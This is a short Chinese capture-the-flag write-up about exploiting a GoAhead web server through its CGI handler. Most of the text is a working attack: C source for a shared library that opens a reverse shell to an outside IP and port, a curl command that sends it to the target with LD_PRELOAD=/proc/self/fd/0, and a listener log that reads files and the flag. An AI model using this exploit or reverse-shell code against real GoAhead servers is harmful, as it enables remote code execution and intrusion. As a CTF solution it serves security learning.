点击此处获得更好的阅读体验
访问网站之后从源码中看到一个cgi链接,点进去发现用的GoAhead,所以直接参考泽哥的文章,exp直接秒掉
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| #include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
char *server_ip="202.182.115.203";
uint32_t server_port=7771;
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void)
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {0};
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(server_port);
attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
exit(0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execve("/bin/sh", 0, 0);
}
|
exp的使用
1
2
| gcc -shared -fPIC ./exp.c -o exp.so
curl -X POST --data-binary @exp.so http://183.129.189.62:14000/cgi-bin/index\?LD_PRELOAD\=/proc/self/fd/0
|
之后服务器上进行监听即可
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| root@zerosll:~
Listening on [0.0.0.0] (family 0, port 7771)
Connection from [183.129.189.58] port 7771 [tcp/*] accepted (family 2, sport 54228)
cat /start.sh
#!/bin/sh
echo "$1";
echo "$1" > /home/ctf/flag;
while :
do
/usr/sbin/chroot --userspec 1000:1000 / /home/ctf/goahead -v --home /home/ctf/test /home/ctf/test/web 9999
done
cat /home/ctf/flag
flag{2392862153ef30405ef5c972139102be}
|